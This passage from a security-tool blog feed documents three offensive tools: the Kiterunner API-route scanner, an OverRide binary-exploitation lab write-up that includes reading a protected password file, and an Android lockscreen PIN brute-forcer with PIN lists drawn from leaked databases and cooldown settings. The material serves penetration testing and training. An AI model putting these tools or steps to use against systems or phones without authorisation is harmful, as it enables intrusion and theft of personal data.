<p><strong>Usage</strong></p> <pre><code># this will use the first 20000 lines in the api routes wordlist<br />kr scan targets.txt -A=apiroutes-210228:20000 -x 10 --ignore-length=34<br /><br /># this will use the first 10 lines in the aspx wordlist<br />kr brute targets.txt -A=aspx-210228:10 -x 10 --ignore-length=34 -easp,aspx<br /></code></pre> <br /><span style="font-size: large;"><b>Concurrency Settings/Going Fast</b></span><br /> <p>Kiterunner is made to go fast on a lot of hosts. But, just because you can run kiterunner at 20000 goroutines, doesn't mean its a good idea. Bottlenecks and <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> degredation will occur at high thread counts due to more time spent scheduling goroutines that are waiting on network IO and kernel context switching.</p> <p>There are two main concurrency settings for kiterunner:</p> <ul> <li><code>-x, --max-connection-per-host</code> - maximum number of open connections we can have on a host. Governed by 1 goroutine each. To avoid DOS'ing a host, we recommend keeping this in a low realm of 5-10. Depending on latency to the target, this will yield on average between 1-5 requests per second per connection (200ms - 1000ms/req) to a host.</li> <li><code>-j, --max-parallel-hosts</code> - maximum number of hosts to scan at any given time. Governed by 1 goroutine supervisor for each</li> </ul> <p>Depending on the hardware you are scanning from, the "maximum" number of goroutines you can run optimally will vary. On an AWS t3.medium, we saw performance degradation going over 2500 goroutines. Meaning, 500 hosts x 5 conn per host (2500) would yield peak performance.</p> <p>We recommend <strong>against</strong> running kiterunner from your <strong>macbook</strong>. Due to poor kernel optimisations for high IO counts and Epoll syscalls on macOS, we noticed substantially poorer (0.3-0.5x) performance when compared to running kiterunner on a similarly configured linux instance.</p> <p>To maximise performance when scanning an individual target, or a large attack surface we recommend the following tips:</p> <ul> <li>Spin up an EC2 instance in a similar geographic region/datacenter to the target(s) you are scanning</li> <li>Perform some initial benchmarks against your target set with varying <code>-x</code> and <code>-j</code> options. We recommend having a typical starting point of around <code>-x 5 -j 100</code> and moving <code>-j</code> upwards as your CPU usage/network performance permits</li> </ul> <br /><span style="font-size: large;"><b>Converting between file formats</b></span><br /> <p>Kiterunner will also let you convert between the schema JSON, a kite file and a standard txt wordlist.</p> <p><strong>Usage</strong></p> <p>The format is decided by the filetype extension supplied by the <code><input></code> and <code><output></code> fields. We support <code>txt</code>, <code>json</code> and <code>kite</code></p> <div><pre><code>kr kb convert wordlist.txt wordlist.kite<br />kr kb convert wordlist.kite wordlist.json<br />kr kb convert wordlist.kite wordlist.txt</code></pre></div> <pre><code>❯ go run ./cmd/kiterunner kb convert -qh<br />convert an input file format into the specified output file format<br /><br />this will determine the conversion based on the extensions of the input and the output<br />we support the following filetypes: txt, json, kite<br />You can convert any of the following into the corresponding types<br /><br />-d Debug mode will attempt to convert the schema with error handling<br />-v=debug Debug verbosity will print out the errors for the schema<br /><br />Usage:<br />kite kb convert <input> <output> [flags]<br /><br />Flags:<br />-d, --debug debug the parsing<br />-h, --help help for convert<br /><br />Global Flags:<br />--config string config file (default is $HOME/.kiterunner.yaml)<br />-o, --output string output format. can be json,text,pretty (default "pretty")<br />-q, --quiet quiet mode. will mute unecessarry pretty text<br />-v, --verbose string level of logging verbosity. can be error,info,debug,trace ( default "info")``bigquery<br /></code></pre> <br /><span style="font-size: large;"><b>Replaying requests</b></span><br /> <p>When you receive a bunch of output from kiterunner, it may be difficult to immediately understand why a request is causing a specific response code/length. Kiterunner offers a method of rebuilding the request from the wordlists used including all the header and body parameters.</p> <ul> <li>You can replay a request by copy pasting the full response output into the <code>kb replay</code> command.</li> <li>You can specify a <code>--proxy</code> to forward your requests through, so you can modify/repeat/intercept the request using 3rd party tools if you wish</li> <li>The golang net/http client will perform a few additional changes to your request due to how the default golang spec implementation (unfortunately).</li> </ul> <div><pre><code>❯ go run ./cmd/kiterunner kb replay -q --proxy=http://localhost:8080 -w routes.kite "POST 403 [ 287, 10, 1] https://target.com/dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents 0cc39f76702ea287ec3e93f4b4710db9c8a86251"<br />11:25AM INF Raw reconstructed request<br />POST /dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents?ar_fields=48637466&code=66132381&db_name=08791392&lang=lg-eng&recursive=false&term_id=72336471 HTTP/1.1<br />Content-Type: any<br /><br /><br />11:25AM INF Outbound request<br />POST /dedalo/lib/dedalo/publication/server_api/v1/json/thesaurus_parents?ar_fields=48637466&code=66132381&db_name=08791392&lang=lg-eng&recursive=false&term_id=72336471 HTTP/1.1<br />Host: target.com<br />User-Agent: Go-http-client/1.1<br />Content-Length: 0<br />Content-Type: any<br />Accept-Encoding: gzip<br /><br /><br />11:25AM INF Response After Redirects<br />HTTP/1.1 403 Forbidden<br />Connection: close<br />Content-Length: 45<br />Content-Type: application/json<br />Date: Wed, 07 Apr 2021 01:25:28 GMT<br />X-Amzn-Requestid: 7e6b2ea1-c662-4671-9eaa-e8cd31b463f2<br /><br />User is not authorized to perform this action</code></pre></div> <br /><span style="font-size: x-large;"><b>Technical Implementation</b></span><br /> <br /><span style="font-size: large;"><b>Intermediate Data Type (PRoutes)</b></span><br /> <p>We use an <a href="https://www.kitploit.com/search/label/Intermediate%20Representation" target="_blank" title="intermediate representation">intermediate representation</a> of wordlists and kitebuilder json schemas in kiterunner. This is to allow us to dynamically generate the fields in the wordlist and reconstruct request bodies/headers and query parameters from a given spec.</p> <p>The PRoute type is composed of Headers, Body, Query and Cookie parameters that are encoded in <code>pkg/proute.Crumb</code>. The Crumb type is an interface that is implemented on types such as UUIDs, Floats, Ints, Random Strings, etc.</p> <p>When performing conversions to and from txt, json and kite files, all the conversions are first done to the <code>proute.API</code> intermediate type. Then the corresponding encoding is written out</p> <br /><span style="font-size: large;"><b>Kite File Format</b></span><br /> <p>We use a super secret kite file format for storing the json schemas from kitebuilder. These are simply protobuf encoded <code>pkg/proute.APIS</code> written to a file. The compilation is used to allow us to quickly deserialize the already parsed wordlist. This file format is not stable, and should only be interacted with using the inbuilt conversion tools for kiterunner.</p> <p>When a new version of the kite file format is released, you may need to recompile your kite files</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/assetnote/kiterunner" rel="nofollow" target="_blank" title="Download Kiterunner">Download Kiterunner</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-17691178398994927732021-04-24T17:30:00.022-04:002021-04-24T17:30:00.349-04:00OverRide - Binary Exploitation And Reverse-Engineering (From Assembly Into C)<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Xs7VjGHtrbY/YIJaoHGvHpI/AAAAAAAAV7w/ufd4B8ALFVcN4vgBy-OeNIvi-8WDTK-ZwCNcBGAsYHQ/s1634/OverRide_1_ssh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="522" data-original-width="1634" height="204" src="https://1.bp.blogspot.com/-Xs7VjGHtrbY/YIJaoHGvHpI/AAAAAAAAV7w/ufd4B8ALFVcN4vgBy-OeNIvi-8WDTK-ZwCNcBGAsYHQ/w640-h204/OverRide_1_ssh.png" width="640" /></a></div><p><br /></p> <p>Explore disassembly, <a href="https://www.kitploit.com/search/label/Binary%20Exploitation" target="_blank" title="binary exploitation">binary exploitation</a> & reverse-engineering through 10 little challenges.</p> <p>In the folder for each level you will find:</p> <ul> <li> <p><strong>flag</strong> - password for next level</p> </li> <li> <p><strong>README.md</strong> - how to find password</p> </li> <li> <p><strong>source.c</strong> - the reverse engineered binary</p> </li> <li> <p><strong>dissasembly_notes.md</strong> - notes on asm</p> </li> </ul> <p>See the <a href="https://github.com/anyashuka/Override/blob/main/subject.pdf" rel="nofollow" target="_blank" title="subject">subject</a> for more details.</p> <p>For more gdb & <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> fun check out the previous project <a href="https://github.com/anyaschukin/RainFall" rel="nofollow" target="_blank" title="RainFall">RainFall</a>.</p><b>Final Score 125/100<br /></b><span><a name='more'></a></span><div><br /></div><div><span style="font-size: large;"><b>Getting Started</b></span><br /> <p>First download from 42 <a href="https://projects.intra.42.fr/uploads/document/document/2096/OverRide.iso" rel="nofollow" target="_blank" title="Binary Exploitation and Reverse-Engineering (from assembly into C) (5)"><em>OverRide.iso</em></a>.</p> <br /><b>Virtual Machine setup</b><br /> <p>On Mac OSX, install <a href="https://www.virtualbox.org/" rel="nofollow" target="_blank" title="VirtualBox">VirtualBox</a>.</p> <p>In VirtualBox create a new VM (click new).</p> <ul> <li>Name and operating system - Type: Linux, Version: (Oracle 64-bit)</li> </ul> <p>Continue through all the next steps with the default settings:</p> <ul> <li>Memory size: 4MB</li> <li>Hard disk: Create a disk now</li> <li>Hard disk file type: VDI(VirtualBox Disk Image)</li> <li>Storage on physical hard disk: Dynamically allocated</li> <li>File size: 12,00GB</li> </ul> <p>Next click Settings > Network > Adapter 1 > Attached to: Bridged Adapter.</p> <p>Still in settings click Storage > Right of "Controller: IDE", there is a CD icon with a + sign (add optical drive). Click Add Disk Image, and select <em>OverRide.iso</em>.</p> <p>Click Start to start the VM, once runnning it should show the VM IP address and prompt user to login.</p> <br /><b>SSH connect</b><br /> <p>Log in from a separate shell as user <em>level00</em> with password <em>level00</em>.</p> <p><code>ssh level00@{VM_IP} -p 4242</code></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-GvSFZ7oAPss/YIJa9u-D-6I/AAAAAAAAV74/nqOlSvwv2ewdiy39Zyyr5kJFqrkjNKcJACNcBGAsYHQ/s1634/OverRide_1_ssh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="522" data-original-width="1634" height="204" src="https://1.bp.blogspot.com/-GvSFZ7oAPss/YIJa9u-D-6I/AAAAAAAAV74/nqOlSvwv2ewdiy39Zyyr5kJFqrkjNKcJACNcBGAsYHQ/w640-h204/OverRide_1_ssh.png" width="640" /></a></div><p><br /></p><b>Level Up</b><br /> <p>As user <em>level00</em> the goal is to read the password for user <em>level01</em>, found at <em>/home/users/level01/.pass</em>. However, user <em>level00</em> does not have permissions to read this file.</p> <p>In the home folder for user <em>level00</em> is a binary <em>level00</em> with SUID set and owner <em>level01</em>.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8lWjYZOf80A/YIJbDTPRhBI/AAAAAAAAV78/0xidIsYllsolZYbZOZQjszKO03lhuG_5wCNcBGAsYHQ/s770/OverRide_2_suid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="108" data-original-width="770" height="90" src="https://1.bp.blogspot.com/-8lWjYZOf80A/YIJbDTPRhBI/AAAAAAAAV78/0xidIsYllsolZYbZOZQjszKO03lhuG_5wCNcBGAsYHQ/w640-h90/OverRide_2_suid.png" width="640" /></a></div><p><br /></p> <p>This means when we execute the binary <em>level00</em>, we do so with the permissions of user <em>level01</em>.</p> <p>We must find a <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> in the binary <em>level00</em> with gdb. Then exploit the vulnerability to run <em>system("/bin/sh")</em>, opening a shell as user <em>level01</em> where we have permissions to read the password.</p> <p><code>cat /home/users/level01/.pass</code></p> <p>Then log in as user <em>level01</em>.</p> <p><code>su level01</code></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dWFPlyrND88/YIJbIn62ZYI/AAAAAAAAV8A/tGYQ64TVxG8xZrzYxOs9GshbSPE9O4YngCNcBGAsYHQ/s587/OverRide_3_su.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="587" height="274" src="https://1.bp.blogspot.com/-dWFPlyrND88/YIJbIn62ZYI/AAAAAAAAV8A/tGYQ64TVxG8xZrzYxOs9GshbSPE9O4YngCNcBGAsYHQ/w640-h274/OverRide_3_su.png" width="640" /></a><span style="text-align: left;"> </span></div> <p>Repeat for each level.</p> <br /><span style="font-size: large;"><b>Reverse-engineered binary</b></span><br /> <p>For each level, we reverse engineered the original <em>source.c</em> by examining the gdb disassembly of the binary.</p> <br /><span style="font-size: large;"><b>Levels Overview</b></span><br /> <ul> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level00" rel="nofollow" target="_blank" title="0">0</a> - Hardcoded password</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level01" rel="nofollow" target="_blank" title="1">1</a> - Ret2Libc attack</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level02" rel="nofollow" target="_blank" title="2">2</a> - printf() format string attack</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level03" rel="nofollow" target="_blank" title="3">3</a> - Brute force password</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level04" rel="nofollow" target="_blank" title="4">4</a> - gets() stack overflow + Return-to-libc attack</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level05" rel="nofollow" target="_blank" title="5">5</a> - Shellcode in env variable + printf() format string attack</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level06" rel="nofollow" target="_blank" title="6">6</a> - Hash value discoverable with gdb</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level07" rel="nofollow" target="_blank" title="7">7</a> - Ret2Libc Attack on unprotected data table</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level08" rel="nofollow" target="_blank" title="8">8</a> - Binary backs up password via symlink</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level09" rel="nofollow" target="_blank" title="9">9</a> - Off-by-one error</p> </li> </ul> <br /><span style="font-size: large;"><b>Team</b></span><br /> <p>I wrote this project in a team with the awesome <a href="https://github.com/dfinnis" rel="nofollow" target="_blank" title="@dfinnis">@dfinnis</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/anyaschukin/OverRide" rel="nofollow" target="_blank" title="Download OverRide">Download OverRide</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-91350405154304897182021-04-17T08:30:00.033-04:002021-04-17T08:30:00.320-04:00Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vC53ouNt_VU/YHYwLilxXMI/AAAAAAAAV4w/NatBA4yVXqgNYgLW5FmQyx2mpKX8XLMrQCNcBGAsYHQ/s989/Android-PIN-Bruteforce_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="684" data-original-width="989" height="442" src="https://1.bp.blogspot.com/-vC53ouNt_VU/YHYwLilxXMI/AAAAAAAAV4w/NatBA4yVXqgNYgLW5FmQyx2mpKX8XLMrQCNcBGAsYHQ/w640-h442/Android-PIN-Bruteforce_1.png" width="640" /></a></div><p><br /></p> <p>Unlock an Android phone (or device) by <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> the lockscreen PIN.</p> <p>Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices!</p><span style="font-size: large;"><b> How it works</b></span><br /> <p>It uses a USB OTG cable to connect the locked phone to the Nethunter device. It emulates a keyboard, automatically tries PINs, and waits after trying too many wrong guesses.</p> <p>[Nethunter phone] <--> [USB cable] <--> [USB OTG adaptor] <--> [Locked Android phone]</p> <p>The USB HID Gadget driver provides emulation of USB Human Interface Devices (HID). This enables an Android Nethunter device to emulate keyboard input to the locked phone. It's just like plugging a keyboard into the locked phone and pressing keys.</p> <p></p><div>This takes just over 16.6 hours with a Samsung S5 to try all possible 4 digit PINs, but with the optimised PIN list it should take you much less time.</div><div><br /></div><b>You will need</b><br /> <ul> <li>A locked Android phone</li> <li>A Nethunter phone (or any rooted Android with HID kernel support)</li> <li>USB OTG (On The Go) cable/adapter (USB male Micro-B to female USB A), and a standard charging cable (USB male Micro-B to male A).</li> <li>That's all!</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b> Benefits</b></span><br /> <ul> <li>Turn your NetHunter phone into an Android PIN cracking machine</li> <li>Unlike other methods, you do not need ADB or USB debugging enabled on the locked phone</li> <li>The locked Android phone does not need to be rooted</li> <li>You don't need to buy special hardware, e.g. Rubber Ducky, Teensy, Cellebrite, XPIN Clip, etc.</li> <li>You can easily modify the backoff time to crack other types of devices</li> <li>It works!</li></ul><div><br /></div><span style="font-size: large;"><b> Features</b></span><br /> <ul> <li>Crack PINs of any length from 1 to 10 digits</li> <li>Use config files to support different phones</li> <li>Optimised PIN lists for 3,4,5, and 6 digit PINs</li> <li>Bypasses phone pop-ups including the Low Power warning</li> <li>Detects when the phone is unplugged or powered off, and waits while retrying every 5 seconds</li> <li>Configurable delays of N seconds after every X PIN attempts</li> <li>Log file</li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>TBC</p> <br /><span style="font-size: large;"><b>Executing the script</b></span><br /> <p>If you installed the script to /sdcard/, you can execute it with the following command.</p> <p><code>bash ./android-pin-bruteforce</code></p> <p>Note that Android mounts /sdcard with the noexec flag. You can verify this with <code>mount</code>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code><br />Android-PIN-Bruteforce (0.1) is used to unlock an Android phone (or device) by bruteforcing the lockscreen PIN.<br /> Find more information at: https://github.com/urbanadventurer/Android-PIN-Bruteforce<br /><br />Commands:<br /> crack Begin cracking PINs<br /> resume Resume from a chosen PIN<br /> rewind Crack PINs in reverse from a chosen PIN<br /> diag Display diagnostic information<br /> version Display version information and exit<br /><br />Options:<br /> -f, --from PIN Resume from this PIN<br /> -a, --attempts Starting from NUM incorrect attempts<br /> -m, --mask REGEX Use a mask for known digits in the PIN<br /> -t, --type TYPE Select PIN or PATTERN cracking<br /> -l, --length NUM Crack PINs of NUM length<br /> -c, --config FILE Specify configuration file to load<br /> -p, --pinlist FILE Specify a custom PIN list<br /> -d, --dry-run Dry run for testing. Does n't send any keys.<br /> -v, --verbose Output verbose logs<br /><br />Usage:<br /> android-pin-bruteforce <command> [options]<br /></code></pre> <br /><span style="font-size: large;"><b>Supported Android Phones/Devices</b></span><br /> <p>This has been successfully tested with various phones including the Samsung S5, S7, Motorola G4 Plus and G5 Plus.</p> <p>It can unlock Android versions 6.0.1 through to 10.0. The ability to perform a bruteforce attack doesn't depend on the Android version in use. It depends on how the device vendor developed their own lockscreen.</p> <p>Check the Phone Database for more details <a href="https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database" rel="nofollow" target="_blank" title="https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database">https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database</a></p><p><br /></p><span style="font-size: large;"><b> PIN Lists</b></span><br /> <p>Optimised PIN lists are used by default unless the user selects a custom PIN list.</p> <br /><b>Cracking PINs of different lengths</b><br /> <p>Use the <code>--length</code> commandline option.</p> <p>Use this command to crack a 3 digit PIN, <code>./android-pin-bruteforce crack --length 3</code></p> <p>Use this command to crack a 6 digit PIN <code>./android-pin-bruteforce crack --length 6</code></p> <br /><b>Where did the optimised PIN lists come from?</b><br /> <p>The optimised PIN lists were generated by extracting numeric passwords from database leaks then sorting by frequency. All PINs that did not appear in the password leaks were appended to the list.</p> <p>The optimised PIN lists were generated from <em>Ga$$Pacc DB Leak</em> (21GB decompressed, 688M Accounts, 243 Databases, 138920 numeric passwords).</p> <br /><b>The 4 digit PIN list</b><br /> <p>The reason that the 4 digit PIN list is used from a different source is because it gives better results than the generated list from <em>Ga$$Pacc DB Leak</em>.</p> <p><code>optimised-pin-length-4.txt</code> is an optimised list of all possible 4 digit PINs, sorted by order of likelihood. It can be found with the filename <code>pinlist.txt</code> at <a href="https://github.com/mandatoryprogrammer/droidbrute" rel="nofollow" target="_blank" title="https://github.com/mandatoryprogrammer/droidbrute">https://github.com/mandatoryprogrammer/droidbrute</a></p> <p>This list is used with permission from Justin Engler & Paul Vines from Senior Security Engineer, iSEC Partners, and was used in their Defcon talk, <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)">Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)</a></p> <br /><b>Cracking with Masks</b><br /> <p>Masks use <a href="https://www.kitploit.com/search/label/Regular%20Expressions" target="_blank" title="regular expressions">regular expressions</a> with the standard grep extended format.</p> <p><code>./android-pin-bruteforce crack --mask "...[45]" --dry-run</code></p> <ul> <li>To try all years from 1900 to 1999, use a mask of <code>19..</code></li> <li>To try PINs that have a 1 in the first digit, and a 1 in the last digit, use a mask of <code>1..1</code></li> <li>To try PINs that end in 4 or 5, use <code>...[45]</code></li></ul><div><span style="font-family: monospace;"><br /></span></div><span style="font-size: large;"><b> Configuration for different phones</b></span><br /> <p>Device manufacturers create their own lock screens that are different to the default or stock Android. To find out what keys your phone needs, plug a keyboard into the phone and try out different combinations.</p> <p>Load a different configuration file, with the <code>--config FILE</code> commandline parameter.</p> <p>Example: <code>./android-pin-bruteforce --config ./config.samsung.s5 crack</code></p> <p>You can also edit the <code>config</code> file by customising the timing and keys sent.</p> <p>The following configuration variables can be used to support a different phone's lockscreen.</p> <pre><code># Timing<br />## DELAY_BETWEEN_KEYS is the period of time in seconds to wait after each key is sent<br />DELAY_BETWEEN_KEYS=0.25<br /><br />## The PROGRESSIVE_COOLDOWN_ARRAY variables act as multi-dimensional array to customise the progressive cooldown<br />## PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________ is the attempt number<br />## PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN is how many attempts to try before cooling down<br />## PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____ is the cooldown in seconds<br /><br />PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)<br />PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)<br />PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)<br /><br />## SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END defines how many seconds before the end of the cooldown period, keys will be sent<br /># set to 0 to disable<br />SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END=5<br />## SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END configures the keys that are sent to dismiss messages and popups before the end of the cooldown period<br />SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END="enter enter enter"<br /><br />## KEYS_BEFORE_EACH_PIN configures the keys that are sent to prompt the lock screen to appear. This is sent before each PIN.<br />## By default it sends "escape enter", but some phones will respond to other keys.<br /><br /># Examples:<br /># KEYS_BEFORE_EACH_PIN="ctrl_escape enter"<br /># KEYS_BEFORE_EACH_PIN="escape space"<br />KEYS_BEFORE_EACH_PIN="escape enter"<br /><br />## KEYS_STAY_AWAKE_DURING_COOLDOWN the keys that are sent during the cooldown period to keep the phone awake<br />KEYS_STAY_AWAKE_DURING_COOLDOWN="enter"<br /><br />## SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS how often the keys are sent, in seconds<br />SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS=5<br /><br />## DELAY_BEFORE_STARTING is the period of time in seconds to wait before the bruteforce begins<br />DELAY_BEFORE_STARTING=2<br />## KEYS_BEFORE_STARTING config ures the keys that are sent before the bruteforce begins<br />KEYS_BEFORE_STARTING="enter"<br /></code></pre> <br /><b>Popups</b><br /> <p>We send keys before the end of the cooldown period, or optionally during the cooldown period. This is to keep the lockscreen app active and to dismiss any popups about the number of incorrect PIN attempts or a low battery warning.</p> <br /><span style="font-size: large;"><b>Test sending keys from the NetHunter phone</b></span><br /> <br /><b>Test sending keys from the terminal</b><br /> <p>Use ssh from your laptop to the NetHunter phone, and use this command to test sending keys:</p> <p>In this example, the enter key is sent.</p> <p><code>echo "enter" | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>In this example, ctrl-escape is sent.</p> <p><code>echo "left-ctrl escape" | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>Note: Sending combinations of keys in <code>config</code> file variables is different. Currently only <code>ctrl_escape</code> is supported.</p> <p>In this example, keys a, b, c are sent.</p> <p><code>echo a b c | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <br /><b>Test sending keys from an app</b><br /> <p>This Android app is a virtual USB Keyboard that you can use to test sending keys.</p> <p><a href="https://store.nethunter.com/en/packages/remote.hid.keyboard.client/" rel="nofollow" target="_blank" title="https://store.nethunter.com/en/packages/remote.hid.keyboard.client/">https://store.nethunter.com/en/packages/remote.hid.keyboard.client/</a></p> <br /><b>How to send special keys</b><br /> <p>Use this list for the following variables:</p> <ul> <li>KEYS_BEFORE_EACH_PIN</li> <li>KEYS_STAY_AWAKE_DURING_COOLDOWN</li> <li>KEYS_BEFORE_STARTING</li> </ul> <p>To send special keys use the following labels. This list can be found in the hid_gadget_test source code.</p> <table> <tr> <th>Key label</th> <th>Key label</th> </tr> <tr> <td>left-ctrl</td> <td>f6</td> </tr> <tr> <td>right-ctrl</td> <td>f7</td> </tr> <tr> <td>left-shift</td> <td>f8</td> </tr> <tr> <td>right-shift</td> <td>f9</td> </tr> <tr> <td>left-alt</td> <td>f10</td> </tr> <tr> <td>right-alt</td> <td>f11</td> </tr> <tr> <td>left-meta</td> <td>f12</td> </tr> <tr> <td>right-meta</td> <td>insert</td> </tr> <tr> <td>return</td> <td>home</td> </tr> <tr> <td>esc</td> <td>pageup</td> </tr> <tr> <td>bckspc</td> <td>del</td> </tr> <tr> <td>tab</td> <td>end</td> </tr> <tr> <td>spacebar</td> <td>pagedown</td> </tr> <tr> <td>caps-lock</td> <td>right</td> </tr> <tr> <td>f1</td> <td>left</td> </tr> <tr> <td>f2</td> <td>down</td> </tr> <tr> <td>f3</td> <td>kp-enter</td> </tr> <tr> <td>f4</td> <td>up</td> </tr> <tr> <td>f5</td> <td>num-lock</td> </tr> </table> <p>To send more than one key at the same time, use the following list:</p> <ul> <li>ctrl_escape (This sends left-ctrl and escape)</li> </ul> <p>If you need more key combinations please open a new issue in the GitHub issues list.</p> <br /><b>Customising the Progressive Cooldown</b><br /> <p>The following section of the <code>config</code> file controls the progressive cooldown.</p> <pre><code>## The PROGRESSIVE_COOLDOWN_ARRAY variables act as multi-dimensional array to customise the progressive cooldown<br />## PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________ is the attempt number<br />## PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN is how many attempts to try before cooling down<br />## PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____ is the cooldown in seconds<br /><br />PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)<br />PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)<br />PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)<br /><br /></code></pre> <p>The array is the same as this table.</p> <table> <tr> <th>attempt number</th> <th>attempts until cooldown</th> <th>cooldown</th> </tr> <tr> <td>1</td> <td>5</td> <td>30</td> </tr> <tr> <td>11</td> <td>1</td> <td>30</td> </tr> <tr> <td>41</td> <td>1</td> <td>60</td> </tr> </table> <br /><b>Why can't you use a laptop?</b><br /> <p>This works from an Android phone because the USB ports are not bidirectional, unlike the ports on a laptop.</p> <br /><b>How Android emulates a keyboard</b><br /> <p>Keys are sent using <code>/system/xbin/hid-keyboard</code>. To test this and send the key 1 you can use <code>echo 1 | /system/xbin/hid-keyboard dev/hidg0 keyboard</code></p> <p>In Kali Nethunter, <code>/system/xbin/hid-keyboard</code> is a compiled copy of <code>hid_gadget_test.c</code>. This is a small program for testing the HID gadget driver that is included in the Linux Kernel. The source code for this file can be found at <a href="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html">https://www.kernel.org/doc/html/latest/usb/gadget_hid.html</a> and <a href="https://github.com/aagallag/hid_gadget_test" rel="nofollow" target="_blank" title="https://github.com/aagallag/hid_gadget_test">https://github.com/aagallag/hid_gadget_test</a>.</p> <br /><span style="font-size: large;"><b><div></div> Troubleshooting</b></span><br /> <br /><b>If it is not bruteforcing PINs</b><br /> <br /><b>Check the orientation of the cables</b><br /> <p>The Nethunter phone should have a regular USB cable attached, while the locked phone should have an OTG adaptor attached.</p> <p>The OTG cable should be connected to the locked Android phone. The regular USB cable should be connected to the Nethunter phone.</p> <p>Refer to the graphic on how to connect the phones.</p> <br /><b>Check it is emulating a keyboard</b><br /> <p>You can verify that the NetHunter phone is succesfully emulating a keyboard by connecting it to a computer using a regular charging/data USB cable. Open a text editor like Notepad while it is cracking and you should see it entering PIN numbers into the text editor.</p> <p>Note that you will not need an OTG cable for this.</p> <br /><b>Try restarting the phones</b><br /> <p>Try powering off the phones and even taking out the batteries if that is possible.</p> <br /><b>Try new cables</b><br /> <p>Try using new cables/adaptors as you may have a faulty cable/adaptor.</p> <br /><b>If it doesn't unlock the phone with a correct PIN</b><br /> <p>You might be sending keys too fast for the phone to process. Increase the DELAY_BETWEEN_KEYS variable in the config file. </p><div></div> If you don't see 4 dots come up on the phone's screen then maybe it is not receiving 4 keys. <br /><b><div></div> Managing Power Consumption</b><br /> <p>If your phone runs out of power too soon, follow these steps:</p> <ul> <li>Make sure both phones are fully charged to 100% before you begin</li> <li>Reduce the screen brightness on both the victim phone and NetHunter phone if possible</li> <li>Place both phones into Airplane mode, however you may want to enable WiFi to access the NetHunter phone via 